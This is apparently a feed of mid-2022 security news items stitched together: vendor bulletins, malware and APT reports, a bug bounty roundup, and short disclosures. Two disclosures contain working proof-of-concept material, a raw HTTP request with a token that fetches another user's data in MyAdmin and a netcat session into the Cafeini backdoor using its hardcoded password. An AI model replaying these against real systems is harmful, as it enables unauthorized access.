IBM Spectrum Protect Client 8.1.0.0 through 8.1.14.0 stores user credentials in plain clear text which can be read by a local user. IBM X-Force ID: 225886.

**Security Bulletin**

  

**Summary**

The IBM Spectrum Protect back-up archive client is vulnerable to information disclosure as user credentials are stored in memory in plain text. The back-up archive client is also vulnerable to a denial of service due to certain read operations on TCP/IP sockets.

**Vulnerability Details**

**CVEID:**   CVE-2022-22478  
**DESCRIPTION:**   IBM Spectrum Protect Client stores user credentials in plain clear text which can be read by a local user.  
CVSS Base score: 6.2  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/225886 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2022-22474  
**DESCRIPTION:**   IBM Spectrum Protect dsmcad, dsmc, and dsmcsvc processes incorrectly handle certain read operations on TCP/IP sockets. This can result in a denial of service for IBM Spectrum Protect client operations.  
CVSS Base score: 5.9  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/225348 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)

**Affected Products and Versions**

**Affected Product(s)**

**Version(s)**

IBM Spectrum Protect Client

8.1.0.0-8.1.14.0

**Remediation/Fixes**

**NOTE**:  APAR IT40671 was created for CVE-2022-22474.

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

29 June 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSEQVQ","label":"IBM Spectrum Protect"},"Component":"Client","Platform":\[{"code":"PF002","label":"AIX"},{"code":"PF016","label":"Linux"},{"code":"PF017","label":"Mac OS"},{"code":"PF033","label":"Windows"},{"code":"PF010","label":"HP-UX"},{"code":"PF027","label":"Solaris"}\],"Version":"8.1","Edition":"","Line of Business":{"code":"LOB26","label":"Storage"}}\]

CVE-2022-22478: Information Disclosure and Denial of Service Vulnerabilities in IBM Spectrum Protect Backup-Archive Client (CVE-2022-22478, CVE-2022-22474)

NXM Autonomous Security protects against network-wide device hacks and defends against critical IoT vulnerabilities.

**June 30, 2022, Mountain View, CA** \- NXM Labs, Inc., a leader in advanced cybersecurity software for connected devices, today unveiled its NXM Autonomous Security(TM) platform that prevents hackers from gaining unauthorized access to commercial, industrial, medical, or consumer internet of things (IoT) devices. Tested in collaboration with the Jet Propulsion Laboratory (JPL), California Institute of Technology (Caltech), NXM successfully demonstrated the ability of its groundbreaking technology to enable future Mars rovers to automatically defend themselves and recover from cyberattacks. Caltech manages JPL on behalf of the National Aeronautics and Space Administration (NASA).

NXM's engineers worked with JPL's Artificial Intelligence, Analytics and Innovation Division, Information Technology and Solutions Directorate (ITSD), along with the Robotic Surface Mobility Group in Pasadena, CA to integrate the company's software with the navigation and ground control systems of JPL's self-driving Athena test rover. During testing, NXM's software successfully detected unauthorized attempts to gain access to the rover's autonomous navigation systems, automatically protecting the vehicle from harm in real-time without impacting normal driving operations.

Tests showed that NXM's platform was capable of securing millions of devices with virtually no impact on network latency and is able to operate up to 1000x faster than other decentralized platforms previously tested by the U.S. Department of Defense under simulated battlefield conditions.

"NXM's technology is game-changing," said Lt. General Harry D. Raduege, Jr., USAF (Ret), former Director, Defense Information Systems Agency and CIO for the North American Aerospace Defense Command and U.S. Space Command. "NXM provides a new layer of cybersecurity that enables unified command and control, as well as data interoperability, providing an unprecedented capability that we have long sought but until now wasn't possible." Lt. General Raduege serves as an advisor to NXM.

The Athena test rover was developed by JPL as part of NASA's High Performance Spaceflight Computing (HPSC) program to develop new computing technologies with vastly more capabilities than current spaceflight computers. JPL engineers harnessed the advanced computing power of the rover's off-the-shelf NVIDIA Jetson AI platform to develop innovative, machine learning-based applications for future Mars rovers. This includes artificial intelligence software that identifies objects of scientific interest as a vehicle traverses the Martian terrain, using vision-based navigation and path planning software to significantly increase the driving distances of energy-limited rovers.

"We're thrilled to have collaborated with NASA JPL to show how our security can protect critical assets in space as well as here on Earth," said Scott Rankine, NXM's President and Co-founder. "Our unique zero-trust and zero-touch security software is chip and cloud agnostic, enabling device manufacturers and their component suppliers to easily and cost-effectively develop the industry's most trustworthy products that can be deployed rapidly and remain secure for their entire operating lifetime."

**About NXM**  
NXM Labs, Inc. provides advanced security solutions for embedded devices that enable commercial, industrial and consumer products to automatically defend themselves and recover from cyberattacks. NXM offers the industry's first Zero-Trust and Zero-Touch product development software platform designed to streamline and automate security management throughout the entire OEM supply chain and product lifecycle. For more information, visit www.nxmlabs.com

NXM Announces Platform That Protects Space Infrastructure and IoT Devices From Cyberattacks

MyAdmin v1.0 is affected by an incorrect access control vulnerability in viewing personal center in /api/user/userData?userCode=admin.

Log in with user1 account on the trial website given by the author, and click the personal center to capture the package.  
The userCode parameter has a vulnerability.  
poc:  
user1 login --> /api/user/userData?userCode=admin

    GET /api/user/userData?userCode=admin HTTP/1.1
    Host: 8.129.86.120
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0
    Accept: application/json, text/plain, */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    myadmin-token: eyJhbGciOiJIUzI1NiJ9.eyJqdGkiOiIxOCIsImlzcyI6InVzZXIxIiwic3ViIjoie1wiZGVwdExpc3RcIjpbNyw4XSxcImRlcHROYW1lc1wiOltcIua3seWcs-i9r-S7tumDqFwiLFwi5YyX5Lqs6L-Q57u06YOoXCJdLFwicm9sZUxpc3RcIjpbNl0sXCJyb2xlTmFtZXNcIjpbXCLova_ku7bpg6jmgLvnm5FcIl0sXCJ1c2VyQ29kZVwiOlwidXNlcjFcIixcInVzZXJJZFwiOjE4LFwidXNlck5hbWVcIjpcIueUqOaItzFcIn0iLCJpYXQiOjE2Mjc0NTE0NzYsImV4cCI6MTYyNzQ1NTA3Nn0.e5q0BKsAo2Q_gXCnAZGn_njPV0oRQoVJKiMJeLDwMvQ
    Connection: close
    Referer: http://8.129.86.120/
    Cookie: sidebarStatus=1; myadmin-token=eyJhbGciOiJIUzI1NiJ9.eyJqdGkiOiIxOCIsImlzcyI6InVzZXIxIiwic3ViIjoie1wiZGVwdExpc3RcIjpbNyw4XSxcImRlcHROYW1lc1wiOltcIua3seWcs-i9r-S7tumDqFwiLFwi5YyX5Lqs6L-Q57u06YOoXCJdLFwicm9sZUxpc3RcIjpbNl0sXCJyb2xlTmFtZXNcIjpbXCLova_ku7bpg6jmgLvnm5FcIl0sXCJ1c2VyQ29kZVwiOlwidXNlcjFcIixcInVzZXJJZFwiOjE4LFwidXNlck5hbWVcIjpcIueUqOaItzFcIn0iLCJpYXQiOjE2Mjc0NTE0NzYsImV4cCI6MTYyNzQ1NTA3Nn0.e5q0BKsAo2Q_gXCnAZGn_njPV0oRQoVJKiMJeLDwMvQ

CVE-2021-37791: There is an ultra vires vulnerability in viewing personal center · Issue #3 · cdfan/my-admin

Backdoor.Win32.Cafeini.b malware suffers from a hardcoded credential vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/a8fc1b3f7a605dc06a319bf0e14ca68b.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Cafeini.bVulnerability: Weak Hardcoded CredentialsDescription: The malware listens on TCP ports 51966 and 23. Authentication is required, however the password "mama" is weak and found within the PE file. Moreover, the FTP server running on non standard port 23 also uses same password. Trying to execute a program incorrectly you get reply like, "STATUS I can't run program", as it requires the full path to the file to execute.Family: CafeiniType: PE32MD5: a8fc1b3f7a605dc06a319bf0e14ca68bVuln ID: MVID-2022-0617Disclosure: 06/29/2022Exploit/PoC:C:\>nc64.exe x.x.x.x 51966CAFEiNi 1.1Enter your password:mamaC:\Users\victim\Desktop>whoamiwhoamiSTATUS: unknown command "WHOAMI"C:\Users\victim\Desktop>exec c:\Windows\system32\calc.exeexec c:\Windows\system32\calc.exeSTATUS: program runnedC:\Users\victim\Desktop>Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Cafeini.b MVID-2022-0617 Hardcoded Credential

An unauthenticated remote code execution vulnerability found in Zoho’s compliance tool could leave organizations exposed to an information disclosure catastrophe, new analysis shows.

A critical vulnerability in Zoho’s widely used compliance tool, ManageEngine ADAudit Plus, which monitors changes to Microsoft Active Directory, leaves endpoints vulnerable to unauthenticated users. A successful exploit could allow an attacker to take over an entire enterprise network, Horizon3.ai researchers warn.  

ADAudit Plus offers a path into an organization’s workstations, servers, and file servers, giving IT admins access to a range of users, groups, permissions, and login credentials, as well as security policies. ADAudit Plus also enables users to collect security events from agents running on other machines in the domain through endpoints that agents use to upload events.

The platform’s ability to offer deep access into a company’s internal IT ecosystem heightens the potential for a nightmare-scenario level of data exposure in the event of a breach.

The CVE-2022-28219 vulnerability enables malicious actors to easily take over a network for which they already have initial access. Malicious actors could exploit this vulnerability to deploy ransomware, exfiltrate sensitive business data, or disrupt business operations.

They could also then go on to exploit XML External Entities (XXE), Java deserialization, and path traversal vulnerabilities to wreak additional havoc, according to an in-depth analysis this week by Horizon3.ai.

**Inside the Vulnerability**

Horizon3.ai discovered some of the ADAudit Plus endpoints used for reporting were unauthenticated.

“One of the first things that stood out was the presence of a /cewolf endpoint handled by the CewolfRenderer servlet in the third-party Cewolf charting library,” the analysis states. “This is the same vulnerable endpoint from CVE-2020-10189, reported against ManageEngine Desktop Central.”

It added, “This gave us a large attack surface to work with because there’s a lot of business logic that was written to process these events. While looking for a file-upload vector, we found a path to trigger a blind XXE \[XML External Entity injection\] vulnerability in the ProcessTrackingListener class, which handles events containing Windows scheduled task XML content.”

The vulnerability was disclosed to Zoho in March, which released a new build, ADAudit Plus 7060, to fix the issue. The patch fixes the vulnerability by removing the /cewolf endpoint altogether, instead using a secure version of DocumentBuilderFactoryin the ProcessingTrackingListener class and requiring authentication in the form of an agent GUID between agents and ADAudit Plus.

**High Stakes, Plus Exploitation Difficult to Detect**

Horizon3.ai chief architect Naveen Sunkavally explains that ManageEngine products are very common in the enterprise and have been favorite targets of attackers over the years.

“ADAudit Plus is a tool that's used for compliance and auditing, which is a common need for many companies spanning different verticals,” he says. “This vulnerability has been found to be present in many types of environments, from healthcare and technology to construction and local governments.”

Just last fall, ManageEngine ADSelfService Plus, Desktop Central, and ServiceDesk Plus were all actively targeted by attackers using previously undisclosed zero days (CVE-2021-44515, CVE-2021-44077, and CVE-2021-40539) that are now part of the CISA Known Exploited Vulnerabilities (KEV) list.

The latest vulnerability is easy to exploit without any prior knowledge and can yield the "keys to the kingdom,  Sunkavally explains. To boot, exploitation is not that easy to detect because it makes use of the natural behavior of the ADAudit Plus application.

“ADAudit Plus is an attractive target for attackers because it integrates with Active Directory and stores high-privileged domain user credentials,” Sunkavally says.

He notes an attacker with initial access to a compromised network could exploit this vulnerability to extract these high-privileged credentials, move laterally, and take over the entire network.

“We've seen real-world environments where just exploiting this vulnerability alone is enough to take over the enterprise,” Sunkavally adds.

He advises businesses using ADAudit Plus to upgrade to build 7060 or later and ensure ADAudit Plus is configured with a dedicated service account with restricted privileges.

“This vulnerability is not one to hold off on patching,” he says.

**Buggy ManageEngine Has History of Vulnerabilities**

This is not the first time the ManageEngine suite was found to have vulnerabilities. Last September a joint advisory from the FBI and CISA warned of APT attackers exploiting a critical authentication bypass vulnerability in ManageEngine ADSelfService Plus.

While Zoho moved to fix the vulnerabilities, less than a month later Palo Alto Networks issued a warning that many companies are still vulnerable.

Most recently, an elusive attack targeting SolarWinds' Orion network management software, dubbed the Supernova cyberattack, exploited a ManageEngine flaw in the software running on a victim's server.

Critical ManageEngine ADAudit Plus Vulnerability Allows Network Takeover, Mass Data Exfiltration

The FBI has warned businesses of an uptick in reports of criminals applying for remote work using deepfake and stolen PII.
The post Criminals are applying for remote work using deepfake and stolen identities, says FBI appeared first on Malwarebytes Labs.

The FBI has warned businesses of an uptick in reports of criminals applying for remote work using deepfake and stolen PII (personally identifiable information).

A deepfake is essentially created or modified media (image, video, or audio), often with the help of artificial intelligence (AI) and machine learning (ML). Deepfake creations are designed to appear and sound as authentic as possible. Because of this, they’re difficult to spot unless you know what to look for.

Years of data breaches made millions of Americans’ identities available for anyone with ill intent to gather and use for personal gains. This time, criminals seem confident about pulling off a scheme that fully intends to sabotage or steal from companies that hire them while keeping their true identities intact.

Armed with compelling synthetic images and videos with legitimate PII, we can imagine criminals likely getting the job before pulling the wool over their employer’s eyes.

Most open positions identified in the report were in the technology field, such as IT (information technology), computer programming, database, and software. The FBI has also noted that some positions criminals are trying to fill would grant them access to PII, financial data, corporate databases, and proprietary information.

Fortunately for organizations, there is a glaring flaw to an otherwise masterful execution of deceit: the deepfakes the criminals use suffer from sync issues.

> “Complaints report the use of voice spoofing, or potentially voice deepfakes, during online interviews of the potential applicants. In these interviews, the actions and lip movement of the person seen interviewed on-camera do not completely coordinate with the audio of the person speaking. At times, actions such as coughing, sneezing, or other auditory actions are not aligned with what is presented visually.”
> 
> ~ FBI, PSA number I-062822-PSA

Misuse of stolen PII is spotted with a pre-employment background check. So even if an interviewer puts the desyncs in a deepfake video down to a dodgy connection, criminals won’t be able to escape findings from a standard background check.

TechCrunch said the most at-risk businesses from criminals entering the job market this way are startups and SaaS (software as a service) companies. This is because these potentially hold lots of data or access to it “but comparatively little security infrastructure compared with the enterprises they serve or are attempting to displace.”

If you’re worried that your data might be used to get criminals into the same sector as you are, there’s not much to do apart from remaining alert and keeping an eye out for strange emails or phone calls.

Stay safe!

Criminals are applying for remote work using deepfake and stolen identities, says FBI

New web targets for the discerning hacker

New web targets for the discerning hacker

Bounty hunting remains a popular business, with a report this month revealing that the vast majority of ethical hackers would like to do more.

The survey, from Belgian bug bounty platform **Intigriti**, found that 96% were keen to spend more time bounty hunting, with two thirds considering it as a full-time career. The biggest draw is the money, cited by nearly half, along with the ability to work anywhere in the world, the ability to work alone, and the chance to outsmart malicious hackers.

Currently, more than half of bug bounty hunters are also in full-time employment elsewhere, and around a third are students. More than one in five, though, get more than a quarter of their total income from bounty payouts.

And for those keen to get stuck in, there’s a new invite-only bug bounty program for the French government’s identity authentication application, **France Identité**, launched earlier this year to complement the country’s new electronic identity cards.

Hosted by Paris-based ethical hacking platform **YesWeHack**, the program has recruited 30 ethical hackers so far, with specific skills relating to the application, particularly cryptography. It will eventually be opened to all, and will run for the mobile app’s lifetime.

Finally, **Google**’s been generous lately, paying out more than $300,000 for reports on a variety of flaws in Google Cloud Platform (GCP) during last year.

Security researcher Sebastian Lutz took first prize, with an award of $133,337, for discovering a bug in in Identity-Aware Proxy (IAP) that offered a way for an attacker to access IAP-protected resources. Second place, meanwhile, went to Hungarian researcher Imre Rad, who earned $73,331 after uncovering a mechanism to take over a Google Compute Engine virtual machine.

The program, which kicked off in 2019, now represents a fair chunk of the total $8.7 million awarded by Google across its complete range of vulnerability disclosure programs.

**The latest bug bounty programs for July 2022**

The past month saw the arrival of several new bug bounty programs. Here’s a list of the latest entries:

**Animal Friends**

**Program provider:**  
Independent

**Program type:**  
Public

**Max reward:**  
£400 ($480)

**Outline:**  
UK pet insurance company Animal Friends has launched a public bug bounty program that’s focused on securing its corporate website, customer portal, vet portal, and sales platform.

**Notes:**  
Discussing the new program, the insurance provider said: “No system is ever perfect, and therefore Animal Friends believes that working with skilled security researchers around the world is crucial to identify and fix any weaknesses.”

Check out the Animal Friends bug bounty page for more details

**ClickHouse**

**Program provider:**  
Bugcrowd

**Program type:**  
Public

**Max reward:**  
$2,500

**Outline:**  
ClickHouse is an open source, column-oriented OLAP database management system that allows users to generate analytical reports using SQL queries in real time.

**Notes:**  
The main focus of the public program is the open source version of the ClickHouse platform.

Check out the ClickHouse bug bounty page at Bugcrowd for more details

**France Identité**

**Program provider:**  
YesWeHack

**Program type:**  
Private

**Max reward:**  
Undisclosed

**Outline:**  
The French government has launched an invite-only bug bounty program for its newly launched identity authentication application, ‘France Identité’.

**Notes:**  
Hosted by Paris-based ethical hacking platform YesWeHack, the program will eventually be opened up to all security researchers and then run for the mobile app’s lifetime.

Check out our recent coverage for more details

**MetaMask**

**Program provider:**  
HackerOne

**Program type:**  
Public

**Max reward:**  
$50,000

**Outline:**  
MetaMask, one of the most widely used wallets for interacting with distributed applications, has launched a bug bounty program offering rewards of up to $50,000 for critical vulnerabilities.

**Notes:**  
MetaMask is particularly seeking reports demonstrating how an attacker could extract the secret recovery phrase or a private key from a wallet, or make a user’s wallet behave in “unexpected ways”.

Check out the MetaMask bug bounty page at HackerOne for more details

**Opera**

**Program provider:**  
Independent

**Program type:**  
Private

**Max reward:**  
Undisclosed

**Outline:**  
The developers behind the Opera web browser have launched a private bug bounty program to accompany the existing public program that’s housed on the Bugcrowd platform.

**Notes:**  
There are currently few details relating to this private program, although anyone expressing an interest must already have a Bugcrowd ID.

Check out Opera’s private bug bounty page for more details

**Phemex**

**Program provider:**  
Bugcrowd

**Program type:**  
Public

**Max reward:**  
$2,500

**Outline:**  
Cryptocurrency trading platform Phemex has partnered with Bugcrowd to launch a bug bounty program.

**Notes:**  
Researchers have been tasked with finding bugs in the Phemex website and mobile apps. Cross-site scripting (XSS) and denial-of-service (DoS) exploits are out of scope.

Check out the Phemex bug bounty page at Bugcrowd for more details

**Other bug bounty and VDP news this month**

*   The 2022 **President’s Cup Cybersecurity Competition** is due to launch later this summer. Hosted by CISA, the annual national cyber competition aims to identify and reward the best cybersecurity talent in the federal executive workforce. Registration is now open for eligible participants.
*   **GameStop**, **Oanda**, and **PlanetArt** have launched (unpaid) VDPs on HackerOne.
*   Security pro Quinten Bowen has launched a **malware analysis capture-the-flag** (CTF) competition. Registration is free, and the CTF has “beginner to intermediate level flags” associated with static and dynamic analysis.

Curated by James Walker. Introduction by Emma Woollacott.

**PREVIOUS EDITION** Bug Bounty Radar // The latest bug bounty programs for June 2022

Bug Bounty Radar // The latest bug bounty programs for July 2022

Immigration organisations are being targeted by the APT group Evilnum, using spear phishing to send malicious Word documents.
The post Immigration organisations targeted by APT group Evilnum appeared first on Malwarebytes Labs.

Organisations working in the immigration sector are advised to be on high alert for Advanced Persistent Threat (APT) attacks. Bleeping Computer reports that European organisations, specifically, are under threat from the Evilnum hacking group.

Evilnum, on the APT scene since 2018 at the earliest and perhaps most well known for targeting the financial sector, appears to have switched gears.

**In times of conflict**

The observed attacks seem to have sprung into life on or around the beginning of the invasion of Ukraine. This is quite worrying for several reasons:

*   Immigration organisations in Europe are still impacted by the fallout from COVID-19. Additionally, Government immigration services continue to be non-functional or afflicted with severe delays in processing. The UK, which set up a dedicated visa for Ukrainian refugees, has experienced processing delays for unrelated visas of up to 6 months as a result of this project. Being targeted with malware could impact crucial services still further, putting people at risk.
*   Huge amounts of sensitive data is passing to and from independent immigration organisations related to the invasion of Ukraine. Exfiltration of this data could put people both outside Ukraine and those still there at risk of significant harm.
*   Many volunteer organisations have sprung up to support efforts related to Ukraine. Many of these have little to no funding and are being run by random groups of immigration lawyers with minimal experience of cybersecurity issues. This is, unfortunately, an area of potential rich pickings for attackers.

**Important attack details**

The APT group targeted an Intergovernmental organisation (IGO), an entity created via treaty which involves two or more nations to work on issues of common interest. This attack, then, is at the highest level in terms of immigration related impact.

It begins, as so many attacks do, with a targeted email containing a rogue attachment. Opening the attached Word document fires up a message which claims that the document was created in a later version of Microsoft Word. It explains how to enable editing in order to view the supposed content, typically called “Compliance” but also “Complaint” or “Proof of ownership”, among others.

Heavily obfuscated JavaScript decrypts and deposits an encrypted binary and a malware loader (which loads up the binary), and creates a scheduled task to keep things constantly ticking over. File system artefacts created during execution are designed to imitate legitimate Windows binary names, to assist in detection avoidance.

The aim here is to create a backdoor on infected systems. Machine snapshots are taken and sent back to base via POST requests, with exfiltrated data in encrypted form.

**Cybersecurity, just from a different point of view**

Refugees from Ukraine are being assisted by multiple organisations that were set up after the initial invasion. Lawyers helping to run these groups may not be fully immersed in cybersecurity. However, they follow strict rules and regulations with regard to client data by default. As a result, they’re often doing security-centric things to keep client data secure without perhaps noticing the crossover.

For example: Most immigration lawyer/client interactions in the UK currently are remote, partly due to COVID-19 and partly because the UK’s visa system is now almost entirely online. As a result, pretty much everything involving sensitive documentation begins life in the form of an email. This sounds bad at first glance; however, this isn’t the case. Lawyers and clients aren’t emailing important documents in plaintext. Instead, they’re making use of encrypted documents, secure file uploads, and deleting data as and when required.

**Tips for immigration orgs**

If you’re a small organisation looking to help with visa or refugee processes for Ukrainians fleeing the invasion, here’s some of the things you can make a start on now to help keep things secure:

*   Ensure your website is HTTPs. Most sites I’ve seen in this realm use a combination of contact email and/or web form. You don’t want sensitive information intercepted because of insecure websites. As few people as possible should have admin access to the site, and anything related to publishing. Use as few extensions and plugins as possible. Paying for domain anonymity services is useful if required.
*   Consider using an alias for public facing email addresses. Additionally, lock down all email addresses with multifactor authentication (MFA). The same goes for backup/recovery emails tied to the main account(s).
*   If you have the choice of SMS codes or authentication apps/hardware based security keys for 2FA, choose the latter. SMS won’t work with no signal reception, and fraudsters may divert your SMS codes via SIM swapping.
*   Consider using a password manager for organization-specific passwords. If you need to share logins, use a management tool which allows you to share logins without revealing the password itself. Should you land on a phishing site, your password manager won’t pre-fill your details into the bogus portal.

I’ve spoken to individuals from several UK-based immigration organisations, including those focused on helping Ukrainians. At this point, none of them report having been targeted by attacks similar to the above. However, those organisations are absolutely in the spotlight for anyone potentially up to no good. If you’re in this line of work, or you’re just getting started, consider where and how you can begin to get things locked down right now.

Immigration organisations targeted by APT group Evilnum

Infamous malware Raccoon Stealer is reportedly back in business after a break.
The post Raccoon Stealer returns with a new bag of tricks appeared first on Malwarebytes Labs.

The popular malware Raccoon stealer, which suspended operations after a developer allegedly died in the Ukraine invasion, has returned.

Raccoon stealer is malware as a service, with the developers selling it to would-be users. The operation is a tightly-run ship, to the extent that customers have digital signatures tied to their executables. If files end up on malware scanning services, the malware authors know exactly who the leak has come from.

**So much data, so little time**

The popular tool, used for data theft, is ubiquitous where stealing credentials is concerned. Cryptocurrency wallets, cookies, passwords, browser autofill data, and credit card data: pretty much anything is up for grabs.

Since 2019, Raccoon stealer has been lifting data from the unwary. Cheap to purchase and packing a large range of features, it is able to steal from as many as 60 different applications including:

**Email**: Outlook, Thunderbird, Thunderbird  
**Browsers**: Firefox, Chrome, Microsoft Edge, Internet Explorer, Vivaldi, SeaMonkey, Vivaldi  
**Cryptocurrency app**s: Exodus, Monero, Electrum, Jaxx

Raccoon’s two most popular delivery methods are phishing campaigns (the tried and tested malicious Word document/Macro combination) and exploit kits. Once data is located on the target system, it is eventually placed into a .zip file and sent to the malware Command and Control (C&C) server.

Its operators are constantly innovating, for example making use of Telegram to operate C&C. This is one malware project which wasn’t going to stay gone for long.

**An all new raccoon rampage**

The new version, Raccoon Stealer 2.0, was claimed as being sold on Telegram and in circulation since May 17. However, these claims related to Telegram have since been shown to be fake.

While functionality appears to be mostly similar to the original version, there are some notable differences. The creators claim to have improved the software and resurrected their malware antics to “honour” the legacy of the teammate who died:

> _After our teammate loss we made a decision that we can not leave our project and we will continue our work in his honour. Raccoon Stealer 2.0 was totally coded from the very beginning. New back-end, new front-end, absolutely new stealer software._

**Smash and grab**

Credit card data, autofill, browser passwords, and a big slice of cryptocurrency wallets are once more targets for Raccoon Stealer. The big change up seems to be related to how data is exfiltrated. This new version doesn’t appear to be particularly stealthy.

The name of the game in data exfiltration is to make as few moves as possible to help evade detection. Sneaky malware will collect data as it goes, before eventually sending the whole lot in a zip in one go. If an infection is constantly pinging away, the chances of it being caught by security tools increases dramatically.

Here, Racoon Stealer seems to be throwing a little caution to the wind. The stealer sends data every single time it adds to its exfiltrated data collection. Researchers note that Raccoon Stealer 2.0 possesses no obfuscation or anti-analysis techniques.

I’d love to know if some sort of data driven analysis led developers to the conclusion that smash and grab is ultimately more suited to their business model than waiting it out. Ultimately, this may be the one bright note for embattled IT admins in the wake of everyone’s least favourite raccoon’s re-emergence onto the malware scene.

Raccoon Stealer returns with a new bag of tricks

Xiaongmai AHB7008T-MH-V2, AHB7804R-ELS, AHB7804R-MH-V2, AHB7808R-MS-V2, AHB7808R-MS, AHB7808T-MS-V2, AHB7804R-LMS, HI3518_50H10L_S39 V4.02.R11.7601.Nat.Onvif.20170420, V4.02.R11.Nat.Onvif.20160422, V4.02.R11.7601.Nat.Onvif.20170424, V4.02.R11.Nat.Onvif.20170327, V4.02.R11.Nat.Onvif.20161205, V4.02.R11.Nat.20170301, V4.02.R12.Nat.OnvifS.20170727 is affected by a backdoor in the macGuarder and dvrHelper binaries of DVR/NVR/IP camera firmware due to static root account credentials in the system.

master

Switch branches/tags

**1** branch **0** tags

Code

**Latest commit**

Snawoot update readme

82b0a92

Aug 9, 2020

update readme

82b0a92

**Git stats**

*   **4** commits

**Files**

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

.gitignore

update gitignore

Feb 4, 2020

LICENSE

Initial commit

Feb 4, 2020

Makefile

upload

Feb 4, 2020

README.md

update readme

Aug 9, 2020

hs-dvr-telnet.c

upload

Feb 4, 2020

**README.md**

**hisilicon-dvr-telnet**

PoC materials for article https://habr.com/en/post/486856/

❤️ ❤️ ❤️

You can say thanks to the author by donations to these wallets:

*   ETH: 0xB71250010e8beC90C5f9ddF408251eBA9dD7320e
*   BTC:
    *   Legacy: 1N89PRvG1CSsUk9sxKwBwudN6TjTPQ1N8a
    *   Segwit: bc1qc0hcyxc000qf0ketv4r44ld7dlgmmu73rtlntw

Tag

#mac